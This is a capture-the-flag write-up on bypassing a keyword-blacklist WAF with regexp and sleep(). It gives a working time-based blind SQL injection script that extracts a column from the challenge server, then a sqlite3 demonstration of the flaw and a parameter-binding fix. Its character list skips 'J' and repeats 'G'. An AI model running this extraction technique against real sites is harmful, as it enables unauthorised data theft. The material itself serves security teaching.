GYCTF Blind Injection [regexp injection + time-based blind injection]
2024-09-05 14:30:57
Key points: regexp injection + time-based blind injection
Source code:
<?php
# the flag is in fl4g
include 'waf.php';
header("Content-type: text/html; charset=utf-8");
$db = new mysql();
$id = $_GET['id'];
if ($id) {
    if (check_sql($id)) {
        exit();
    } else {
        $sql = "select * from flllllllag where id=$id";
        $db->query($sql);
    }
}
highlight_file(__FILE__);
union, select, ' and = are all banned, but sleep() is not.
So consider a time-based blind injection that uses regexp in place of =:
?id=1 or if((length(database()) regexp 5), sleep(5), 1)
exp:
# Script source: https://www.gem-love.com/ctf/1669.html#i-2
import requests
import time
from urllib.parse import quote

url = "http://2c2d306b5d6745be846972da7fd262b6e3668d53fa124de3.changame.ichunqiu.com/?id=111"
# The ten trailing entries were empty on the page; digits 0-9 are assumed.
alphabet = ['?','!',',','|','[',']','{','}','_','/','*','-','+','&',"%",'#','@','$','~','a','b','c','d','e','f','j','h','i','g','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','A','B','C','D','E','F','G','H','I','G','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z','0','1','2','3','4','5','6','7','8','9']
target = 'fl4g'
result = ''
MAX_LEN = 40  # the range bounds were lost from the page; assumed upper limit
print('www.gem-love.com')
for i in range(1, MAX_LEN + 1):
    for char in alphabet:
        # Build the payload
        payload = ' or if((substr(({}),{},1) regexp "^{}"),sleep(3),1)'.format(target, i, char)
        # Measure the response time
        start = int(time.time())
        r = requests.get(url + quote(payload))
        response_time = int(time.time()) - start
        # The threshold was lost from the page; 3 matches the sleep(3) in the payload
        if response_time >= 3:
            result += char
            print('Found: {}'.format(result))
            break
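
Why the filter fails, and what fixes it, as an added example (not code from the original post or the challenge): the value lands in a numeric context, so a condition can be appended without any of the banned tokens. Assumptions: Python's sqlite3 stands in for MySQL, the `BANNED` pattern stands in for the unseen waf.php, the table row is constructed, and `parse_id`, `lookup_concat` and `lookup_bound` are illustrative names.

```python
import re
import sqlite3

# Assumption: stand-in for the unseen waf.php, rejecting the tokens the
# write-up lists as banned (union, select, ', =).
BANNED = re.compile(r"union|select|'|=", re.IGNORECASE)

# The probe from the write-up; it contains none of the banned tokens.
PAGE_PAYLOAD = "1 or if((length(database()) regexp 5), sleep(5), 1)"
# Constructed equivalent that SQLite can evaluate (no if()/sleep() there).
SQLITE_PAYLOAD = "111 or length(fl4g) > 0"


def blacklist_allows(raw_id: str) -> bool:
    """True when the keyword blacklist lets the value through."""
    return BANNED.search(raw_id) is None


def parse_id(raw_id: str) -> int:
    """Allowlist check: the whole value must be 1-9 ASCII digits."""
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        raise ValueError("id must consist of digits only")
    return int(raw_id)


def demo_db() -> sqlite3.Connection:
    """In-memory table with one constructed row (id 1)."""
    db = sqlite3.connect(":memory:")
    db.execute("create table flllllllag (id integer, fl4g text)")
    db.execute("insert into flllllllag values (1, 'constructed-secret')")
    return db


def lookup_concat(db: sqlite3.Connection, raw_id: str) -> list:
    """The page's pattern: raw input pasted into the SQL text."""
    return db.execute("select * from flllllllag where id=" + raw_id).fetchall()


def lookup_bound(db: sqlite3.Connection, raw_id: str) -> list:
    """Hardened: validate as an integer, then bind it as a parameter."""
    sql = "select * from flllllllag where id=?"
    return db.execute(sql, (parse_id(raw_id),)).fetchall()


if __name__ == "__main__":
    db = demo_db()
    print("blacklist passes page payload:", blacklist_allows(PAGE_PAYLOAD))
    print("concatenated, id 111 + condition:", lookup_concat(db, SQLITE_PAYLOAD))
    print("bound, id 1:", lookup_bound(db, "1"))
```

With concatenation, id 111 (which does not exist) still returns the row because the appended condition is evaluated as SQL; the bound version rejects anything that is not a plain integer before the query is built.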